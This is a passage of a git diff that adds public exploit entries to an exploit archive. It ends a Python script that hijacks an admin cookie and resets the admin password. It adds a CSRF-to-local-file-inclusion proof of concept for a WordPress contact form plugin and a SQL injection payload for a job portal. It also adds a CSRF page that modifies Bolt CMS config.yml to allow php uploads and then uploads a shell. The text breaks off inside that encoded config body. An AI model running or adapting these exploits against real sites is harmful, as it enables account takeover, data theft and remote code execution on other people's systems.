+cookie = re.split(r'\s', cookies)[0].replace(';','').replace('crc=','').strip()
+print "Admin Cookie : crc="+cookie+""
+
+
+# Change admin password
+
+purl = "http://"+rhost+"/pages/crc_handler.php?method=profile&func=update"
+pcookies = {"crc": ""+cookie+""}
+pheaders = {"Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
+pdata={"context": "ou%3DDon+Mills%2Cou%3DToronto%2Cou%3DOntario%2Cou%3DCanada%2Co%3DCRC+World", "profileid": "1", "username": ""+uname+"", "password": ""+npass+"", "fname": "Firstname", "lname": "Lastname", "email": "admin@domain.com", "gender": "Male", "day": "19", "month": "11", "year": "1977", "add1": "Campulung", "add2": '', "city": "Campulung", "province": "AG", "country": "Romania", "pc": "115100", "lcode": "0040", "lprefix": "0000", "lpostfix": "000000", "update": "Update"}
+p = requests.post(purl, headers=pheaders, cookies=pcookies, data=pdata)
+
+if p.status_code == 200:
+  print "New password successfully created! New Password: "+npass+""
+else:
+  print "Something went wrong. You should try manual exploitation"
+  sys.exit()
\ No newline at end of file
diff --git a/exploits/php/webapps/46661.html b/exploits/php/webapps/46661.html
new file mode 100644
index 000000000..bdf077bc1
--- /dev/null
+++ b/exploits/php/webapps/46661.html
@@ -0,0 +1,141 @@
+# Exploit Title: Contact Form by WD [CSRF → LFI]
+# Date: 2019-03-17
+# Exploit Author: Panagiotis Vagenas
+# Vendor Homepage: http://web-dorado.com/
+# Software Link: https://wordpress.org/plugins/contact-form-maker
+# Version: 1.13.1
+# Tested on: WordPress 5.1.1
+
+Description
+-----------
+
+Plugin implements the following AJAX actions:
+
+- `manage_fm`
+- `get_stats`
+- `generete_csv`
+- `generete_xml`
+- `formmakerwdcaptcha`
+- `nopriv_formmakerwdcaptcha`
+- `formmakerwdmathcaptcha`
+- `nopriv_formmakerwdmathcaptcha`
+- `product_option`
+- `FormMakerEditCountryinPopup`
+- `FormMakerMapEditinPopup`
+- `FormMakerIpinfoinPopup`
+- `show_matrix`
+- `FormMakerSubmits`
+- `FormMakerSQLMapping`
+- `select_data_from_db`
+- `manage`
+
+All of them call the function `form_maker_ajax_fmc`. This function
+dynamicaly loads a file defined in `$_GET['action']` or
+`$_POST['action']` if the former is not defined. Because of the way
+WordPress defines the AJAX action a user could define the plugin action
+in the `$_GET['action']` and AJAX action in `$_POST['action']`.
+Leveraging that and the fact that no sanitization is performed on the
+`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
+file using directory traversal thus leading to Local File Inclusion
+vulnerability.
+
+The following AJAX actions are available only for the paid version of
+the plugin:
+
+- `paypal_info`
+- `checkpaypal`
+- `nopriv_checkpaypal`
+- `get_frontend_stats`
+- `nopriv_get_frontend_stats`
+- `frontend_show_map`
+- `nopriv_frontend_show_map`
+- `frontend_show_matrix`
+- `nopriv_frontend_show_matrix`
+- `frontend_paypal_info`
+- `nopriv_frontend_paypal_info`
+- `frontend_generate_csv`
+- `nopriv_frontend_generate_csv`
+- `frontend_generate_xml`
+- `nopriv_frontend_generate_xml`
+- `FMShortocde`
+- `wd_bp_dismiss`
+
+In both free and paid versions, there are no-privilege actions that can
+be exploited by unauthenticated users in order to include local files.
+
+PoC
+---
+
+```html
+<form method="post"
+action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=../../../../../index.php">
+    <label>AJAX action:
+        <select name="action">
+            <optgroup label="Free version">
+                <option value="FMShortocde_fmc">FMShortocde_fmc</option>
+                <option
+value="FormMakerEditCountryinPopup_fmc">FormMakerEditCountryinPopup_fmc</option>
+                <option
+value="FormMakerIpinfoinPopup_fmc">FormMakerIpinfoinPopup_fmc</option>
+                <option
+value="FormMakerMapEditinPopup_fmc">FormMakerMapEditinPopup_fmc</option>
+                <option
+value="FormMakerSQLMapping_fmc">FormMakerSQLMapping_fmc</option>
+                <option
+value="FormMakerSubmits_fmc">FormMakerSubmits_fmc</option>
+                <option
+value="formmakerwdcaptcha_fmc">formmakerwdcaptcha_fmc</option>
+                <option
+value="formmakerwdmathcaptcha_fmc">formmakerwdmathcaptcha_fmc</option>
+                <option
+value="frontend_show_matrix_fmc">frontend_show_matrix_fmc</option>
+                <option value="generete_csv_fmc">generete_csv_fmc</option>
+                <option value="generete_xml_fmc">generete_xml_fmc</option>
+                <option value="get_stats_fmc">get_stats_fmc</option>
+                <option value="manage_fmc">manage_fmc</option>
+                <option value="manage_fm_fmc">manage_fm_fmc</option>
+                <option
+value="nopriv_formmakerwdcaptcha_fmc">nopriv_formmakerwdcaptcha_fmc</option>
+                <option
+value="nopriv_formmakerwdmathcaptcha_fmc">nopriv_formmakerwdmathcaptcha_fmc</option>
+                <option
+value="product_option_fmc">product_option_fmc</option>
+                <option
+value="select_data_from_db_fmc">select_data_from_db_fmc</option>
+                <option value="wd_bp_dismiss_fmc">wd_bp_dismiss_fmc</option>
+            </optgroup>
+            <optgroup label="Pro Version">
+                <option value="paypal_info_fmc">paypal_info_fmc</option>
+                <option value="checkpaypal_fmc">checkpaypal_fmc</option>
+                <option
+value="nopriv_checkpaypal_fmc">nopriv_checkpaypal_fmc</option>
+                <option
+value="nopriv_get_frontend_stats_fmc">nopriv_get_frontend_stats_fmc</option>
+                <option
+value="get_frontend_stats_fmc">get_frontend_stats_fmc</option>
+                <option
+value="frontend_show_map_fmc">frontend_show_map_fmc</option>
+                <option
+value="nopriv_frontend_show_map_fmc">nopriv_frontend_show_map_fmc</option>
+                <option value="show_matrix_fmc">show_matrix_fmc</option>
+                <option
+value="nopriv_frontend_show_matrix_fmc">nopriv_frontend_show_matrix_fmc</option>
+                <option
+value="frontend_paypal_info_fmc">frontend_paypal_info_fmc</option>
+                <option
+value="nopriv_frontend_paypal_info_fmc">nopriv_frontend_paypal_info_fmc</option>
+                <option
+value="frontend_generate_csv_fmc">frontend_generate_csv_fmc</option>
+                <option
+value="nopriv_frontend_generate_csv_fmc">nopriv_frontend_generate_csv_fmc</option>
+                <option
+value="frontend_generate_xml_fmc">frontend_generate_xml_fmc</option>
+                <option
+value="nopriv_frontend_generate_xml_fmc">nopriv_frontend_generate_xml_fmc</option>
+            </optgroup>
+        </select>
+    </label>
+    <button type="submit" value="Submit">Submit</button>
+</form>
+
+```
\ No newline at end of file
diff --git a/exploits/php/webapps/46663.txt b/exploits/php/webapps/46663.txt
new file mode 100644
index 000000000..13127c260
--- /dev/null
+++ b/exploits/php/webapps/46663.txt
@@ -0,0 +1,15 @@
+# Exploit Title: NCrypted Jobgator - SQL Injection
+# Date: 05.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.ncrypted.net/jobgator/
+# Demo Site: https://demo.ncryptedprojects.com/jobgator/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request: http://localhost/[PATH]/agents/Find-Jobs
+Vulnerable Parameter: experience (POST)
+Payload: btnsearch=Search&experience=1" OR NOT
+4365=4365#&job_title=Mr.&location=1
\ No newline at end of file
diff --git a/exploits/php/webapps/46664.html b/exploits/php/webapps/46664.html
new file mode 100644
index 000000000..89337b19b
--- /dev/null
+++ b/exploits/php/webapps/46664.html
@@ -0,0 +1,109 @@
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <script>
+      function exploit() {
+
+        var target = "http://127.0.0.1"
+
+        var bolt_admin_url = target + "/bolt";
+
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", bolt_admin_url + "/upload", true);
+        xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------130713229751679908527494159");
+        xhr.withCredentials = true;
+        var body = "-----------------------------130713229751679908527494159\r\n" + 
+          "Content-Disposition: form-data; name=\"files[]\"; filename=\"stager.html\"\r\n" + 
+          "Content-Type: text/plain\r\n" + 
+          "\r\n" + 
+          "\x3cscript\x3e\r\n" + 
+          "\r\n" + 
+          "function exploit(){\r\n" + 
+          "\r\n" + 
+          "        var bolt_admin_url = \""+bolt_admin_url+"\";\r\n" + 
+          "\r\n" + 
+          "        var xhr = new XMLHttpRequest();\r\n" + 
+          "        \r\n" + 
+          "        if(xhr) {\r\n" + 
+          "            xhr.open(\'GET\', bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" + 
+          "            xhr.onreadystatechange = handler;\r\n" + 
+          "            xhr.send();\r\n" + 
+          "        }\r\n" + 
+          "\r\n" + 
+          "        function handler(){\r\n" + 
+          "          if (xhr.readyState == 4 && xhr.status == 200) {\r\n" + 
+          "                user_page = document.createElement(\'html\');\r\n" + 
+          "                user_page.innerHTML = xhr.responseText;\r\n" + 
+          "                token_input = (user_page.getElementsByTagName(\'input\')[0]).value;\r\n" + 
+          "                console.log(\"Token obtained:\" + token_input);\r\n" + 
+          "                ModifyAllowedExtensions(token_input);\r\n" + 
+          "                UploadShell();\r\n" + 
+          "          }\r\n" + 
+          "        }\r\n" + 
+          "\r\n" + 
+          "        function ModifyAllowedExtensions(token) {\r\n" + 
+          "\r\n" + 
+          "            var xhr = new XMLHttpRequest();\r\n" + 
+          "            xhr.open(\"POST\", bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" + 
+          "            xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" + 
+          "            xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" + 
+          "            xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n" + 
+          "            xhr.withCredentials = true;\r\n" + 
+          "            var body = \"file_edit%5B_token%5D=\"+token+\"&file_edit%5Bcontents%5D=%23+Database+setup.+The+driver+can+be+either+\\\'sqlite\\\'%2C+\\\'mysql\\\'+or+\\\'postgres\\\'.%0D%0A%23%0D%0A%23+For+SQLite%2C+only+the+databasename+is+required.+However%2C+MySQL+and+PostgreSQL%0D%0A%23+also+require+\\\'username\\\'%2C+\\\'password\\\'%2C+and+optionally+\\\'host\\\'+(+and+\\\'port\\\'+)+if+the+database%0D%0A%23+server+is+not+on+the+same+host+as+the+web+server.%0D%0A%23%0D%0A%23+If+you\\\'re+trying+out+Bolt%2C+just+keep+it+set+to+SQLite+for+now.%0D%0Adatabase%3A%0D%0A++++driver%3A+sqlite%0D%0A++++databasename%3A+bolt%0D%0A%0D%0A%23+The+name+of+the+website%0D%0Asitename%3A+A+sample+site%0D%0Apayoff%3A+The+amazing+payoff+goes+here%0D%0A%0D%0A%23+The+theme+to+use.%0D%0A%23%0D%0A%23+Don\\\'t+edit+the+provided+templates+directly%2C+because+they+_will_+get+updated%0D%0A%23+in+next+releases.+If+you+wish+to+modify+a+default+theme%2C+copy+its+folder%2C+and%0D%0A%23+change+the+name+here+accordingly.%0D%0Atheme%3A+base-2018%0D%0A%0D%0A%23+The+locale+that\\\'ll+be+used+by+the+application.+If+no+locale+is+set+the%0D%0A%23+fallback+locale+is+\\\'en_GB\\\'.+For+available+options%2C+see%3A%0D%0A%23+https%3A%2F%2Fdocs.bolt.cm%2Fother%2Flocales%0D%0A%23%0D%0A%23+In+some+cases+it+may+be+needed+to+specify+(non-standard)+variations+of+the%0D%0A%23+locale+to+get+everything+to+work+as+desired.%0D%0A%23%0D%0A%23+This+can+be+done+as+%5Bnl_NL%2C+Dutch_Netherlands%5D+when+specifying+multiple%0D%0A%23+locales%2C+ensure+the+first+is+a+standard+locale.%0D%0Alocale%3A+en_GB%0D%0A%0D%0A%23+Set+the+timezone+to+be+used+on+the+website.+For+a+list+of+valid+timezone%0D%0A%23+settings%2C+see%3A+http%3A%2F%2Fphp.net%2Fmanual%2Fen%2Ftimezones.php%0D%0A%23+timezone%3A+UTC%0D%0A%0D%0A%23+Set+maintenance+mode+on+or+off.%0D%0A%23%0D%0A%23+While+in+maintenance+mode%2C+only+users+of+level+editor+or+higher+can+access+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+All+other+visitors+are+presented+with+a+notice+that+the+site+is+currently%0D%0A%23+offline.%0D%0A%23%0D%0A%23+The+default+template+file+can+be+found+in+%2Fapp%2Ftheme_defaults%2F+and+overridden%0D%0A%23+with+this+option+using+your+own+theme.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Amaintenance_mode%3A+false%0D%0Amaintenance_template%3A+maintenance_default.twig%0D%0A%0D%0A%23+The+hour+of+the+day+for+the+internal+cron+task+scheduler+to+run+daily%2C+weekly%2C%0D%0A%23+monthly+and+yearly+jobs.%0D%0A%23%0D%0A%23+Default%3A+3+(3+am)%0D%0Acron_hour%3A+3%0D%0A%0D%0A%23+If+your+site+is+reachable+under+different+urls+(say%2C+both+blog.example.org%2F%0D%0A%23+as+well+as+example.org%2F)%2C+it\\\'s+a+good+idea+to+set+one+of+these+as+the%0D%0A%23+canonical%2C+so+it\\\'s+clear+which+is+the+primary+address+of+the+site.%0D%0A%23%0D%0A%23+If+you+include+%60https%3A%2F%2F%60%2C+it+will+be+included+in+the+canonical+urls.%0D%0A%23canonical%3A+example.org%0D%0A%0D%0A%23+Bolt+can+insert+a+%3Clink+rel%3D%22shortcut+icon%22%3E+for+all+pages+on+the+site.%0D%0A%0D%0A%23+Note%3A+The+location+given+is+relative+to+the+currently+selected+theme.+If%0D%0A%23+++++++you+want+to+set+the+icon+yourself%2C+just+don\\\'t+enable+the+following+line.%0D%0A%23favicon%3A+images%2Ffavicon-bolt.ico%0D%0A%0D%0A%23+The+default+content+to+use+for+the+homepage%2C+and+the+template+to+render+it%0D%0A%23+with.+This+can+either+be+a+specific+record+(like+%60page%2F1%60)+or+a+listing+of%0D%0A%23+records+(like+%60entries%60).+In+the+chosen+\\\'homepage_template\\\'%2C+you+will+have%0D%0A%23+%60record%60+or+%60records%60+at+your+disposal%2C+depending+on+the+\\\'homepage\\\'+setting.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on%0D%0A%23+++++++the+website%2C+be+sure+to+check+for+a+theme.yml+file+in+your+theme\\\'s%0D%0A%23+++++++folder.+If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Ahomepage%3A+homepage%2F1%0D%0Ahomepage_template%3A+index.twig%0D%0A%0D%0A%23+The+default+content+for+the+404+page.+Can+be+an+(array+of)+template+names+or%0D%0A%23+identifiers+for+records%2C+which+will+be+tried+until+a+match+is+found.%0D%0A%23%0D%0A%23+Note%3A+The+record+specified+in+this+parameter+must+be+set+to+\\\'published\\\'.%0D%0Anotfound%3A+%5B+not-found.twig%2C+block%2F404-not-found+%5D%0D%0A%0D%0A%23+The+default+template+for+single+record+pages+on+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+Can+be+overridden+for+each+contenttype+and+for+each+record%2C+if+it+has+a%0D%0A%23+\\\'templateselect\\\'+field.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Arecord_template%3A+record.twig%0D%0A%0D%0A%23+The+default+template+and+amount+of+records+to+use+for+listing-pages+on+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+Can+be+overridden+for+each+contenttype.%0D%0A%23%0D%0A%23+Note+1%3A+Sorting+on+TAXONOMY-pages+will+give+unexpected+results%2C+if+it+has+a%0D%0A%23+++++++++pager.%0D%0A%23+++++++++If+you+need+sorting+on+those%2C+make+sure+you+display+all+the+records+on+one%0D%0A%23+++++++++page.%0D%0A%23%0D%0A%23+Note+2%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s%0D%0A%23+++++++++folder.+If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Alisting_template%3A+listing.twig%0D%0Alisting_records%3A+6%0D%0Alisting_sort%3A+datepublish+DESC%0D%0A%0D%0A%23+Because+of+limitations+on+how+the+underlying+database+queries+work%2C+there+are%0D%0A%23+only+two+options+for+sorting+on+taxonomies.+\\\'ASC\\\'+for+roughly+%22oldest+first%22%0D%0A%23+and+\\\'DESC\\\'+for+roughly+\\\'newest+first\\\'.%0D%0Ataxonomy_sort%3A+DESC%0D%0A%0D%0A%23+Template+for+showing+the+search+results.+If+not+defined%2C+uses+the+settings+for%0D%0A%23+listing_template+and+listing_records.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Asearch_results_template%3A+search.twig%0D%0Asearch_results_records%3A+10%0D%0A%0D%0A%23+Add+jQuery+to+the+rendered+HTML%2C+whether+or+not+it\\\'s+added+by+an+extension.%0D%0Aadd_jquery%3A+false%0D%0A%0D%0A%23+The+default+amount+of+records+to+show+on+overview+pages.+Can+be+overridden%0D%0A%23+for+each+contenttype.%0D%0Arecordsperpage%3A+10%0D%0A%0D%0A%23+Settings+for+caching+in+parts+of+Bolt.%0D%0A%23+-+config%3A++++++++Caches+the+parsed+.yml+files+from+%2Fapp%2Fconfig.+It\\\'s+updated%0D%0A%23++++++++++++++++++immediately+when+one+of+the+files+changes+on+disk.+There%0D%0A%23++++++++++++++++++should+be+no+good+reason+to+turn+this+off.%0D%0A%23%0D%0A%23+-+templates%3A+++++Caches+rendered+templates.%0D%0A%23%0D%0A%23+-+request%3A+++++++Caches+rendered+pages+in+the+configured+HTTP+reverse+proxy%0D%0A%23++++++++++++++++++cache%2C+on+GET+%26+HEAD+requests.%0D%0A%23++++++++++++++++++By+default+this+is+handled+by+Syfmony+HTTP+Cache.%0D%0A%23%0D%0A%23+-+duration%3A++++++The+duration+(in+minutes)+for+the+\\\'templates\\\'+and+\\\'request\\\'%0D%0A%23++++++++++++++++++options.+default+is+10+minutes.+Note+that+the+duration+is+set%0D%0A%23++++++++++++++++++on+storing+the+cache.+By+lowering+this+value+you+will+not%0D%0A%23++++++++++++++++++invalidate+currently+cached+items.%0D%0A%23%0D%0A%23+-+authenticated%3A+Cache+\\\'templates\\\'+and+\\\'request\\\'+for+logged-on+users.+In+most%0D%0A%23++++++++++++++++++cases+you+should+*NOT*+enable+this%2C+because+it+will+cause%0D%0A%23++++++++++++++++++side-effects+if+the+website+shows+different+content+to%0D%0A%23++++++++++++++++++authenticated+users.%0D%0A%23%0D%0A%23+-+thumbnails%3A++++Caches+thumbnail+generation.%0D%0A%23%0D%0A%23+-+translations%3A++Caches+translation+files.+It+is+recommend+to+leave+this%0D%0A%23++++++++++++++++++enabled.+Only+if+you+develop+extensions+and+work+with%0D%0A%23++++++++++++++++++translation+files+you+should+turn+this+off.%0D%0Acaching%3A%0D%0A++++config%3A+true%0D%0A++++templates%3A+true%0D%0A++++request%3A+false%0D%0A++++duration%3A+10%0D%0A++++authenticated%3A+false%0D%0A++++thumbnails%3A+true%0D%0A++++translations%3A+true%0D%0A%0D%0A%23+Set+\\\'enabled\\\'+to+\\\'true\\\'+to+log+all+content+changes+in+the+database.%0D%0A%23%0D%0A%23+Unless+you+need+to+rigorously+monitor+every+change+to+your+site\\\'s+content%2C+it%0D%0A%23+is+recommended+to+keep+this+disabled.%0D%0Achangelog%3A%0D%0A++++enabled%3A+false%0D%0A%0D%0A%23+Default+settings+for+thumbnails.%0D%0A%23%0D%0A%23+Quality+should+be+between+0+(horrible%2C+small+file)+and+100+(best%2C+huge+file).%0D%0A%23%0D%0A%23+cropping%3A+++++++++++One+of+either+crop%2C+fit%2C+borders%2C+resize.%0D%0A%23+default_thumbnail%3A++The+default+size+of+images%2C+when+using%0D%0A%23+++++++++++++++++++++%7B%7B+record.image%7Cthumbnail()+%7D%7D%0D%0A%23+default_image%3A++++++The+default+size+of+images%2C+when+using%0D%0A%23+++++++++++++++++++++%7B%7B+record.image%7Cimage()+%7D%7D%0D%0A%23+allow_upscale%3A++++++Determines+whether+small+images+will+be+enlarged+to+fit%0D%0A%23+++++++++++++++++++++the+requested+dimensions.%0D%0A%23+browser_cache_time%3A+Sets+the+amount+of+seconds+that+the+browser+will+cache%0D%0A%23+++++++++++++++++++++images+for.+Set+it+to+activate+browser+caching.%0D%0A%23%0D%0A%23+Note%3A+If+you+change+these+values%2C+you+might+need+to+clear+the+cache+before%0D%0A%23+++++++they+show+up.%0D%0Athumbnails%3A%0D%0A++++default_thumbnail%3A+%5B+160%2C+120+%5D%0D%0A++++default_image%3A+%5B+1000%2C+750+%5D%0D%0A++++quality%3A+80%0D%0A++++cropping%3A+crop%0D%0A++++notfound_image%3A+bolt_assets%3A%2F%2Fimg%2Fdefault_notfound.png%0D%0A++++error_image%3A+bolt_assets%3A%2F%2Fimg%2Fdefault_error.png%0D%0A++++save_files%3A+false%0D%0A++++allow_upscale%3A+false%0D%0A++++exif_orientation%3A+true%0D%0A++++only_aliases%3A+false%0D%0A%23++++browser_cache_time%3A+2592000%0D%0A%0D%0A%23+Define+the+HTML+tags+and+attributes+that+are+allowed+in+\\\'cleaned\\\'+HTML.+This%0D%0A%23+is+used+for+sanitizing+HTML%2C+to+make+sure+there+are+no+undesirable+elements%0D%0A%23+left+in+the+content+that+is+shown+to+users.+For+example%2C+tags+like+%60%3Cscript%3E%60%0D%0A%23+or+%60onclick%60-attributes.%0D%0A%23+Note%3A+enabling+options+in+the+%60wysiwyg%60+settings+will+implicitly+add+items+to%0D%0A%23+the+allowed+tags.+For+example%2C+if+you+set+%60images%3A+true%60%2C+the+%60%3Cimg%3E%60+tag%0D%0A%23+will+be+allowed%2C+regardless+of+it+being+in+the+%60allowed_tags%60+setting.%0D%0Ahtmlcleaner%3A%0D%0A++++allowed_tags%3A+%5B+div%2C+span%2C+p%2C+br%2C+hr%2C+s%2C+u%2C+strong%2C+em%2C+i%2C+b%2C+li%2C+ul%2C+ol%2C+mark%2C+blockquote%2C+pre%2C+code%2C+tt%2C+h1%2C+h2%2C+h3%2C+h4%2C+h5%2C+h6%2C+dd%2C+dl%2C+dt%2C+table%2C+tbody%2C+thead%2C+tfoot%2C+th%2C+td%2C+tr%2C+a%2C+img%2C+address%2C+abbr%2C+iframe%2C+caption%2C+sub%2C+sup%2C+figure%2C+figcaption+%5D%0D%0A++++allowed_attributes%3A+%5B+id%2C+class%2C+style%2C+name%2C+value%2C+href%2C+src%2C+alt%2C+title%2C+width%2C+height%2C+frameborder%2C+allowfullscreen%2C+scrolling%2C+target%2C+colspan%2C+rowspan+%5D%0D%0A%0D%0A%23+Uploaded+file+handling%0D%0A%23%0D%0A%23+You+can+change+the+pattern+match+and+replacement+on+uploaded+files+and+if+the%0D%0A%23+resulting+filename+should+be+transformed+to+lower+case.%0D%0A%23%0D%0A%23+Setting+\\\'autoconfirm%3A+true\\\'+prevents+the+creation+of+temporary+lock+files%0D%0A%23+while+uploading.%0D%0A%23%0D%0A%23+upload%3A%0D%0A%23+++++pattern%3A+\\\'%5B%5EA-Za-z0-9%5C.%5D%2B\\\'%0D%0A%23+++++replacement%3A+\\\'-\\\'%0D%0A%23+++++lowercase%3A+true%0D%0A%23+++++autoconfirm%3A+false%0D%0A%0D%0A%23+Define+the+file+types+(extensions+to+be+exact)+that+are+acceptable+for+upload%0D%0A%23+in+either+\\\'file\\\'+fields+or+through+the+\\\'files\\\'+screen.%0D%0Aaccept_file_types%3A+%5B+php%2C+twig%2C+html%2C+js%2C+css%2C+scss%2C+gif%2C+jpg%2C+jpeg%2C+png%2C+ico%2C+zip%2C+tgz%2C+txt%2C+md%2C+doc%2C+docx%2C+pdf%2C+epub%2C+xls%2C+xlsx%2C+ppt%2C+pptx%2C+mp3%2C+ogg%2C+wav%2C+m4a%2C+mp4%2C+m4v%2C+ogv%2C+wmv%2C+avi%2C+webm%2C+svg%5D%0D%0A%0D%0A%23+Alternatively%2C+if+you+wish+to+limit+these%2C+uncomment+the+following+list%0D%0A%23+instead.+It+just+includes+file+types+%2F+extensions+that+are+harder+to+exploit.%0D%0A%23+accept_file_types%3A+%5B+gif%2C+jpg%2C+jpeg%2C+png%2C+txt%2C+md%2C+pdf%2C+epub%2C+mp3%2C+svg+%5D%0D%0A%0D%0A%23+If+you+want+to+\\\'brand\\\'+the+Bolt+backend+for+a+client%2C+you+can+change+some+key%0D%0A%23+variables+here%2C+that+determine+the+name+of+the+backend%2C+and+adds+a+primary%0D%0A%23+support%2Fcontact+link+to+the+footer.++Add+a+scheme%2C+like+%60mailto%3A%60+or%0D%0A%23+%60https%3A%2F%2F%60+to+the+email+or+URL.%0D%0A%23%0D%0A%23+Additionally+you+can+change+the+mount+point+for+the+backend%2C+either+for%0D%0A%23+convenience+or+to+obscure+it+from+prying+eyes.%0D%0A%23%0D%0A%23+The+Bolt+backend+is+accessible+as+%60%2Fbolt%2F%60+by+default.+If+you+change+it+here%2C%0D%0A%23+it+will+only+be+accessible+through+the+value+set+in+\\\'path\\\'.%0D%0A%23+Keep+the+path+simple%3A+lowercase+only%2C+no+extra+slashes+or+other+special%0D%0A%23+characters.%0D%0A%23+branding%3A%0D%0A%23+++++name%3A+SuperCMS%0D%0A%23+++++path%3A+%2Fadmin%0D%0A%23+++++provided_by%3A+%5B+supercool%40example.org%2C+%22Supercool+Webdesign+Co.%22+%5D%0D%0A%23+++++news_source%3A+http%3A%2F%2Fnews.example.org%0D%0A%23+++++news_variable%3A+news%0D%0A%0D%0A%23+Show+the+\\\'debug\\\'+nut+in+the+lower+right+corner+for+logged-in+user.+By+default%2C%0D%0A%23+the+debugbar+is+only+shown+to+logged-in+users.+Use+the+\\\'debug_show_loggedoff\\\'%0D%0A%23+option+to+show+it+to+all+users.+You+probably+do+not+want+to+use+this+in+a%0D%0A%23+production+environment.%0D%0Adebug%3A+true%0D%0Adebug_show_loggedoff%3A+true%0D%0Adebug_permission_audit_mode%3A+false%0D%0Adebug_error_level%3A+8181+++++++++++%23+equivalent+to+E_ALL+%26~+E_NOTICE+%26~+E_DEPRECATED+%26~+E_USER_DEPRECATED+%26~+E_WARNING%0D%0A%23+debug_error_level%3A+-1+++++++++++++++%23+equivalent+to+E_ALL%0D%0Adebug_error_use_symfony%3A+false++++++%23+When+set+to+true%2C+Symfony+Profiler+will+be+used+for+exception+display+when+possible%0D%0Adebug_trace_argument_limit%3A+4+++++++%23+Determine+how+many+steps+in+the+backtrace+will+show+(dump)+arguments.%0D%0A%0D%0A%23+error+level+when+debug+is+disabled%0D%0Aproduction_error_level%3A+8181+%23+%3D+E_ALL+%26~+E_NOTICE+%26~+E_WARNING+%26~+E_DEPRECATED+%26~+E_USER_DEPRECATED%0D%0A%0D%0A%23+System+debug+logging%0D%0A%23+This+will+enable+intensive+logging+of+Silex+functions+and+will+be+very+hard+on%0D%0A%23+performance+and+log+file+size.++++The+log+file+will+be+created+in+your+cache%0D%0A%23+directory.%0D%0A%23%0D%0A%23+Enable+this+for+short+time+periods+only+when+diagnosing+system+issues.%0D%0A%23+The+level+can+be+either%3A+DEBUG%2C+INFO%2C+NOTICE%2C+WARNING%2C+ERROR%2C+CRITICAL%2C+ALERT%2C+EMERGENCY%0D%0Adebuglog%3A%0D%0A++++enabled%3A+false%0D%0A++++filename%3A+bolt-debug.log%0D%0A++++level%3A+DEBUG%0D%0A%0D%0A%23+Use+strict+variables.+This+will+make+Bolt+complain+if+you+use+%7B%7B+foo+%7D%7D%2C%0D%0A%23+when+foo+doesn\\\'t+exist.%0D%0Astrict_variables%3A+false%0D%0A%0D%0A%23+There+are+several+options+for+giving+editors+more+options+to+insert+images%2C%0D%0A%23+video%2C+etc+in+the+WYSIWYG+areas.+But%2C+as+you+give+them+more+options%2C+that%0D%0A%23+means+they+also+have+more+ways+of+breaking+the+preciously+designed+layout.%0D%0A%23%0D%0A%23+By+default+the+most+\\\'dangerous\\\'+options+are+set+to+\\\'false\\\'.+If+you+choose+to%0D%0A%23+enable+them+for+your+editors%2C+please+instruct+them+thoroughly+on+their%0D%0A%23+responsibility+not+to+break+the+layout.%0D%0Awysiwyg%3A%0D%0A++++images%3A+false++++++++++++%23+Allow+users+to+insert+images+in+the+content.%0D%0A++++anchor%3A+false++++++++++++%23+Adds+a+button+to+create+internal+anchors+to+link+to.%0D%0A++++tables%3A+false++++++++++++%23+Adds+a+button+to+insert+and+modify+tables+in+the+content.%0D%0A++++fontcolor%3A+false+++++++++%23+Allow+users+to+mess+around+with+font+coloring.%0D%0A++++align%3A+false+++++++++++++%23+Adds+buttons+for+\\\'align+left\\\'%2C+\\\'align+right\\\'%2C+etc.%0D%0A++++subsuper%3A+false++++++++++%23+Adds+buttons+for+subscript+and+superscript%2C+using+%60%3Csub%3E%60+and+%60%3Csup%3E%60.%0D%0A++++embed%3A+false+++++++++++++%23+Allows+the+user+to+insert+embedded+video\\\'s+from+Youtube%2C+Vimeo%2C+etc.%0D%0A++++underline%3A+false+++++++++%23+Adds+a+button+to+underline+text%2C+using+the+%60%3Cu%3E%60-tag.%0D%0A++++ruler%3A+false+++++++++++++%23+Adds+a+button+to+add+a+horizontal+ruler%2C+using+the+%60%3Chr%3E%60-tag.%0D%0A++++strike%3A+false++++++++++++%23+Adds+a+button+to+add+stikethrough%2C+using+the+%60%3Cs%3E%60-tag.%0D%0